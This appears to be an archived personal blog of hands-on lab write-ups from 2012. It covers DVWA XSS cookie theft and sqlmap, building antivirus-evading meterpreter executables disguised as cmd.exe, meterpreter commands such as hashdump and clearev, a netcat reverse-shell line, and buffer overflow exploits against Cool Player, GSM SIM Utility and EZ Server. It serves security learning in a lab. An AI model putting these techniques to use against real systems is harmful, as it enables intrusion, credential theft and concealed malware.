Minggu, 28 Oktober 2012

DVWA Medium Security Attack part 1 : XSS & SQLMap

1. Prepare your lab using metasploitable run from your virtual box, and then try to access dvwa via port 80 at your browser. Use user as admin and password as password
don't forget to set security level to medium scale
 2. Pick XSS reflected for first way.
and try to write <script language="javascript">alert("Dodol")</script> to the box, and submit it.
 ok we succeed...now we try different way..

3. Pick XSS stored for 2nd way
and try to fill <script language="javascript">alert("Dodol")</script> to message box, but due to lack of space permitted we can use firebug (firefox add on) to edit it.
and change value of maxlength="250", now we can write the script into msg box, see how the result
Ooops...we failed right now ;( ...don't worry we try another trick. Now we try to pick the script into name box (not msg box), and for sure edit form script using firebug again.
and then submit it...see the result right now.
allright...bro ^^.

4. Now we can try to get cookie of web, fisrt try to xss reflected. Write this script <script language="javascript">alert(document.cookie)</script>.
and now with same way try to paste script into xss stored (name box).

don't forget to copy the cookie into text editor(geany,kate,kwrite or notepad).


5. Now we want to use SQL injection url path using for sqlmap run.
and run sqlmap
 ok, now we have access for mysql root...and connect to it
to be continued...part 2 ^^





 











Sabtu, 20 Oktober 2012

Transferring Crafted File part 2 : More Advanced Meterpreter

Ok...we continue our discussion, after we learn and know most the type of payload metasplioit profides, now we try to learn to make crafted file that use msfpayload and msfencode combination . Msfencode is purpose to bypass anti virus detection of our exploit files we sent to our victim.
Ok enough talking and do more...^^, lets practicing
1. Run this command
the command above means :
  • we create payload using msfpayload module meterpreter reverse tcp
  • we use listening host (our ip) 192.168.56.1
  • we use listening port 6789
  • we encode using msfencode using shikata ga nai encoder
  • we also make 5 times iteration to make the code (-c 5)
  • we create exe file (-t exe)
  • save file as cmd.exe
wait a minute....there are liltle bit attention...look at cmd.exe file we crafted (73 KB on mine)... and compare it with real cmd.exe (380 KB) size from windows, for beginner user it'll no problem but if we face medium user he will check the size of cmd.exe..because it's not run as usual. So if we want to make our file more perfect we can modified our command. 
First copy real cmd.exe file from windows xp rename the file into ex. cmd2.exe. then we can run this command :

then copy our crafted file (cmd3.exe) to windows and try to overwrite real cmd.exe by renaming our file name.

2. Run handler
Because we selected reverse meterpreter payload, we need to setup the exploit handler to handle the connection back to our attacking machine. In this case attacker use IP address 192.168.56.1. Go to Metasploit console by typing msfconsole, and then run :

3. Run our crafted file (cmd3.exe) or for real wait victim using cmd.exe (after we overwrite real cmd file), and from our shell should look like :

Done ^^
More Advanced Meterpreter
because we have some duty to finish, so we try to continue using meterpreter advantage to control victim system. Use ? or -h for list of command
Here we are after we using some of command :

^^....we try to disable mouse and keyboard of our lab...and done..haha, and now we try several commands
meterpreter>help  #meterpreter help#
meterpreter>hashdump  #dump windows system hash values#
meterpreter>sysinfo  #system information#
meterpreter>shell   #To get command prompt (cmd.exe)#
meterpreter>background  #Return to  msf console#
meterpreter>ps  #process list#
meterpreter>execute -f notepad.exe  #To execute notepad in victim machine#
meterpreter>clearev   #To clean all system logs#
meterpreter>screenshot   #Take a snapshot of victim desktop#

result :














Transferring Crafted File part 1

Now we try to learn how to make file contain payload inside of it using msfpayload, before we discuss it, better we know the different about bind and reverse payload
bind --> we attack victim (usual way)
reverse --> victim unconsciously contacted attacker (wow....)

Next, how to do them?? Lets we practice on our LAB
1. Open terminal and write msfpayload command and we should see like this:

option -h is the same result when we do msfpayload command
option -l give us all list of pay load we can use. For complete information we can read from this .
  • Bind listening on port payload of our victims we shall attack while the reverse payload, we are opening the port to accept connections from the victim. Another options are just the different protocol ,ipv6 or ipv4 or transport layer (tcp, udp) or aplication (http etc.).
  • Staged payload means there are several payload to executed, initial payload is usually smaller in size that is used as a way to execute the next payload. Stage payload type is usually used to deceive anti-virus . The usual payload is the same as we execute a backdoor eg "netcat-e / bin / sh attacker 3333" for the reverse connection.
  • While for meterpreter & vnc, we inject the library using vnc or meterpreter server and run it from memory.
    The different is with vnc if we can get the graphic display of the victim's computer,while if meterpreter its more assortment & powerful payload.
       
  • Injection method itself usually using utility from windows loader and some reflective .dll injection techniques using reflective loader to load the library in memory of the host process and execute.

 Okay, enough for theory..^^, now practicing..
1. Make bind shell payload
now go to /tmp directory and copy bind.exe file to our LAB, run it right now and write this command on cmd windows.
it means port 4444 opened, now we ready to use netcat on our BT.
  done......we inside windows system.

2. Make reverse shell payload
now go to /tmp directory and copy reverse.exe file to our LAB and run netcat to listen to port 4444, then run reverse.exe from LAB. The result should like this.

Done ^^, and to be continued...




 

Kamis, 11 Oktober 2012

Cool Player 219 Buffer Overflow

Hi again friends...now we want to learn how to exploit Cool Player v. 219. as usual first we have to find out information about this application and find it's vulnerablity method. 

So, we found that we can use file.m3u (playlist file).
1. Make Fuzzer
create new fuzzer and write down the code above, and run it. then read using ollydbg
from the result we know that Coolplayer can be exploit using local direct return method.

2. Create pattern offset
Next step is create pattern using pattern_create.rb and put the codes into our fuzzer, and run it again on coolplayer and ollydbg, the result like this
then, find the offset of EIP using pattern_offset.tb, and we found


3. JMP ESP
Next step is to find executable module we can use and put the address into our fuzzer. IN this case we can use shell32.dll at JMP ESP command (7C9D30F3) and before we run fuzzer, don't forget do breakpoint at JMP ESP address.
4. Make payload
Because of the space of junk left, we can use execute command payload to put in our fuzzer, so the codes will be

Run fuzzer again, and it should be calculator appear in our lab replacing coolplayer. 



GSM SIM Utility v.5.15 Buffer Overflow Exploit

Assalamu'alaikum wr. wb..
Hi...friend, today we are try to exploit an application name GSM SIM utility v. 515. There were something interested experience i've got while exploiting this application, want to know ...lets get it on ^^

1. As usual prepare application in our LAB,and analyze it.
     and after analyze it for about 1 hour, we found that, SIM editor have vulnerabilty using file.sms

2. Make fuzzer
Now we try to sent few junk into the application, here are the script
Here we are the first "interesting thing", SIM Editor finally crash after we load the file(exploit.sms) but after we read the registry using Ollydbg its kind a SEH buffer overflow method, but our instructor said that it can use Direct return method. So i have to try again find the perfect junk to sent to make it suddenly crash. 
junk = "\x41" * 1900

After decreased junk step by step, finally SIM editor suddenly crash using 1900 junk.

3. Find the offset
Next step, we make 1900 pattern using pattern_create.rb and take the codes into our buffer. But what happen is SIM Editor failed to crash....OMG, what we have to do next???? Finally we know, that this application can't read ASCII character or we can't use pattern to automatically find the offset. So we have to find it manually..(hahaha)
Later, after patienly divide and search the offset we found the way and change fuzzer code
and read it using Ollydbg
from picture below, we found that the offset for overwrite EIP at 810.

4. JMP ESP Command
Next, we can use shell32.dll executable module and find address of it
5. Make payload

We can use bind shell payload codes and take the code into fuzzer
6. Make final fuzzer
After we got all codes we need, we are gonna put all codes into our final fuzzer, one important thing we should remember is that SIM Editor cant read ASCII char or encoder char (\x), so we modified the codes like this
7. Run fuzzer
Last step is fuzzing SIM Editor and telnet it....

 
 Alhamdulillah...we've done it !!....
Wassalamu'alaikum wr. wb


Minggu, 07 Oktober 2012

EZ Server 6 Stack Buffer Overflow Part2

From my post before, we allready done to exploit Ezserver6 using execute command payload type, but how if we want to execute bind shell? is that enough empty space? Now we are gonna discuss it.
 
1. Calculate the space
     Junk space we found only 240 bytes, and as we konow bind shell payload need at least 317 bytes free space. How we solve it? There are method name egghunter. 

2. Generate Bind Shell payload
Before we learn about egghunter, we can generate payload first
Generate it, then copy the codes to fuzzer.


3. Egghunter method 
Documentation about egghunter method u can learn more in this site : Egg Hunter , before we put egghunter code ino our fuzzer we must prepare the
 skenario >> payload=sampah+jmp+alamat+egghunter+padding+ "w00tw00t"  + shellcode;
So our fuzzer will be :
 now the last,...we can try fuzzing on Ezserver again.

Alhamdulillah....we succeed....

EZ Server 6 Stack Buffer Overflow

Assalamu'alaikum wr. wb...guys, meet you again, and right now we want to try exploiting EZ server v. 6 running on windows XP SP3. Ok lets get it on...

1. Information Gathering, Service Enumeration
    We can use nmap or zenmap to explore information about our target
Ok from information we found, port 8000/tcp opened and service that running is HTTP 1.0

2. Vulnerability Assesment
In this step we can make simple script, basic on python and use get request on HTTP 1.0
save script as ezexploit.py and run it. What happened is EZ server suddenly crashed, it means EZ server that running on port 8000 is vulner....

3. Exploiting with SEH Buffer Overflow
Now We try to analyze from our LAB with Ollydbg, after fuzzer run to EZ Server.
 From picture showed that ESP overwrite by "A" junk but EIP not yet overwrite, thats because EZ have SEH Handler. Now our duty its try to by pass SEH and know the address of EIP. So we can make pattern, using this command :
# ./pattern_create.rb 7000 > ezstring.txt
 
open ezstring file and copy the codes into our fuzzer,
and then run fuzzer again on our target. After it, try to see SEH chain at Ollydbg, and we found
alright....we got it, now next step is find offset from address SE handles shown using command,
# ./pattern_offset.rb 48316F48 7000
5883

Ok before change fuzzer script, we must know that we one way to handle SEH is using POP,POP,RETN method. To find modules that run that method we can use OllySSEH plugin to automaticaly scan it. You can download the plugin at OllySSEH plugin . This plugin does an in-memory scanning of process loaded modules checking if they were compiled with /SafeSEH, if so it can list the registered handlers (you can follow them at CPU window doing double click). This plugin is useful when exploiting vulnerabilities in systems with Software DEP protection.

The plugin lists all loaded modules and can give you the following results for each one:

    /SafeSEH Off : No /SafeSEH, jump party ;-)
   
    /SafeSEH ON  : /SafeSEH active, you can list registered handles
                   using rigth click.
                  
    No SEH       : SEH is not active for this module, take a look
                   at PE/COFF specs (IMAGE_DLLCHARACTERISTICS_ NO_SEH)
                  
    Error        : There was an error reading module structure :-(

and after we try scanning, the result was.
Ok, there are 3 files, js32dll, MSVCRTD.dll and Ezserver6.exe. Forget Ezserver6.exe, so we can just find between js32.dll or MSVCRTD.dll. Now we can search for POP r32,POP r32, RETN command if there exist in the module
ok after we found that MSVCRT.dll, compatible to by pass SEHandler on EZserver, now we change the script like this
and make sure we set breakpoint on POP r32 address >> 10209696, and run fuzzer again.


From picture showed, we know that EIP have overwrited. Then we set jump short code into fuzzer same as before, how many byte we jump is free (in this case we use 6 byte jump), JMP SHORT command is used to ordered CPU to jump forward to the next few bytes according which is input by the user, and then the CPU will start the process of execution from the address.

As we see, the address showed 01FFFF09 - 01FFFFF9 or in decimal 240 byte junk. Now our duty is to make shellcode amounted no more than 240 bytes
 
 generate payload and then copy the code into our fuzzer

and....look by yourself the result...
but, wait it it's not finish yet, to be continue...^^